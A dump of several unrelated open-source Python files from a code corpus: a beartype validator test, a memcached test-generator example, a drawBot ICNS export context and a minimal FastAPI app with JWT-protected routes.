assert IsInTheLightOfThought.is_valid(like_a_glow_worm_golden) is False
assert IsSingingHymnsUnbidden.is_valid(like_a_glow_worm_golden) is False
# Assert these validators reject objects defining attributes with the same
# names but differing values to those subscripting these validators.
assert IsInTheLightOfThought.is_valid(like_a_high_born_maiden) is False
assert IsSingingHymnsUnbidden.is_valid(scattering_unbeholden) is False
# Assert these validators have the expected representation.
IsInTheLightOfThought_repr = repr(IsInTheLightOfThought)
assert repr('with_thy_voice_is_loud') in IsInTheLightOfThought_repr
assert repr(AS_WHEN_NIGHT_IS_BARE) in IsInTheLightOfThought_repr
# Validator synthesized from the above validators with the domain-specific
# language (DSL) supported by these validators.
IsInTheLightOfThoughtOrSingingHymnsUnbidden = (
IsInTheLightOfThought | IsSingingHymnsUnbidden)
# Assert this object performs the expected validation.
assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid(
AllTheEarthAndAir()) is True
assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid(
WhatThouArtWeKnowNot()) is True
assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid(
InAPalaceTower()) is False
assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid(
TillTheWorldIsWrought()) is False
assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid(
InADellOfDew()) is False
# Assert this object provides the expected representation.
assert '|' in repr(IsInTheLightOfThoughtOrSingingHymnsUnbidden)
def test_api_vale_isattr_fail() -> None:
'''
Test unsuccessful usage of the :mod:`beartype.vale.IsAttr` factory.
'''
# Defer heavyweight imports.
from beartype.roar import BeartypeValeSubscriptionException
from beartype.vale import IsAttr, IsEqual
from pytest import raises
# Assert that subscripting this factory with the empty tuple raises the
# expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr[()]
# Assert that subscripting this factory with the empty tuple raises the
# expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr[()]
# Assert that subscripting this factory with one non-tuple argument raises
# the expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr['Among the flowers and grass, which screen it from the view:']
# Assert that subscripting this factory with three or more arguments raises
# the expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr[
"Like a rose embower'd",
"In its own green leaves,",
"By warm winds deflower'd,",
]
# Assert that subscripting this factory with two arguments whose first
# argument is *NOT* a string raises the expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr[
IsEqual['Till the scent it gives'],
IsEqual[
'Makes faint with too much sweet those heavy-winged thieves:']]
# Assert that subscripting this factory with two arguments whose first
# argument is the empty string raises the expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr['', IsEqual['Sound of vernal showers']]
# Assert that subscripting this factory with two arguments whose first
# argument is an invalid Python identifier raises the expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr['On the twinkling grass,', IsEqual["Rain-awaken'd flowers,"]]
|
Acceleration/memcached/regressionSims/testgen/memlib_example.py | pooyaww/Vivado_HLS_Samples | 326 | 11097449 | #!/usr/bin/python
import memlib
## FORMATTING A KV-PAIR #######################################################
# V1
ShortTest = memlib.kv_pair("k", "v", "DEADBEEF", 42)
# V2
Integration1 = {
"key" : "this-is-the-key-that-i'll-be-using-for-the-next-time-to-test-the-longest-of-all-keys",
"value" : "aaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiiiiiiijjjjjjjjkkkkkkkkllllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyyyyyyzzzzzzzz",
"flags" : "0000002a", # 32bit, hex-encoded
"expiration" : 13
}
## CREATING SINGLE REQUESTS ####################################################
print "Binary Set Request"
rq = memlib.binarySetRequest(Integration1, "aabbccdd")
print memlib.simulationInput(rq)
print "Binary Set Response"
rq = memlib.binarySetResponse(Integration1, "aabbccdd")
print memlib.simulationOutput(rq)
print "Binary Get Request"
rq = memlib.binaryGetRequest(Integration1, "aabbccdd")
print memlib.simulationInput(rq)
print "2 Binary Get Request w/o delay"
print memlib.simulationInput(rq, False), # the ',' avoids the newline after print.
print memlib.simulationInput(rq)
print "Binary Get Response"
rq = memlib.binaryGetResponse(Integration1, "aabbccdd")
print memlib.simulationOutput(rq)
## CREATING FULL TESTSET #######################################################
print "Two Request @ Rate 12Gbps/1Gbps"
r1 = memlib.binarySetRequest(Integration1)
r2 = memlib.binaryGetRequest(Integration1)
print memlib.requests12Gbps([r1, r2])
print memlib.requests1Gbps([r1, r2])
r1 = memlib.binarySetResponse(Integration1)
r2 = memlib.binaryGetResponse(Integration1)
print memlib.responses([r1, r2])
print "Useful functions"
print ("%08x" % 42)
print "Key".encode('hex')
|
drawBot/context/icnsContext.py | andyclymer/drawbot | 302 | 11097455 | <filename>drawBot/context/icnsContext.py<gh_stars>100-1000
import Quartz
import os
import shutil
import tempfile
from drawBot.misc import executeExternalProcess, DrawBotError
from drawBot.context.imageContext import ImageContext
class ICNSContext(ImageContext):
fileExtensions = ["icns"]
allowedPageSizes = [16, 32, 128, 256, 512, 1024]
def _writeDataToFile(self, data, path, options):
# create a iconset folder
iconsetPath = tempfile.mkdtemp(suffix=".iconset")
try:
# get the complete pdf
pdfDocument = Quartz.PDFDocument.alloc().initWithData_(data)
pageCount = pdfDocument.pageCount()
# set the image resolution
options["imageResolution"] = 72
# make a copy and alter the resolution
options_2x = dict(options)
options_2x["imageResolution"] = 144
# start loop over all pages
for index in range(pageCount):
# get the pdf page
page = pdfDocument.pageAtIndex_(index)
# get the pdf page, this acts also as pdf document...
pageData = page.dataRepresentation()
# extract the size of the page
_, (w, h) = page.boundsForBox_(Quartz.kPDFDisplayBoxArtBox)
w = int(round(w))
h = int(round(h))
# dont allow any other size, the command iconutil will not work otherwise
if w not in self.allowedPageSizes or w != h:
raise DrawBotError("The .icns can not be build with the size '%sx%s'. Must be either: %s" % (w, h, ", ".join(["%sx%s" % (i, i) for i in self.allowedPageSizes])))
# generate a 72 dpi png in the iconset path
pngPath = os.path.join(iconsetPath, "icon_%sx%s.png" % (w, h))
super(ICNSContext, self)._writeDataToFile(pageData, pngPath, options)
# generate a 144 dpi png in the iconset path
pngPath_2x = os.path.join(iconsetPath, "icon_%sx%[email protected]" % (w, h))
super(ICNSContext, self)._writeDataToFile(pageData, pngPath_2x, options_2x)
# collect all iconutil commands
cmds = [
"iconutil",
"--convert",
"icns",
"--output",
path,
iconsetPath,
]
# execute the commands
stdout, stderr = executeExternalProcess(cmds)
finally:
# always remove the iconset
shutil.rmtree(iconsetPath)
|
app.py | sahilt20/fastapi-mongo | 120 | 11097472 | <reponame>sahilt20/fastapi-mongo
from fastapi import FastAPI, Depends
from auth.jwt_bearer import JWTBearer
from routes.student import router as StudentRouter
from routes.admin import router as AdminRouter
app = FastAPI()
token_listener = JWTBearer()
@app.get("/", tags=["Root"])
async def read_root():
return {"message": "Welcome to this fantastic app."}
app.include_router(AdminRouter, tags=["Administrator"], prefix="/admin")
app.include_router(StudentRouter, tags=["Students"], prefix="/student", dependencies=[Depends(token_listener)])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.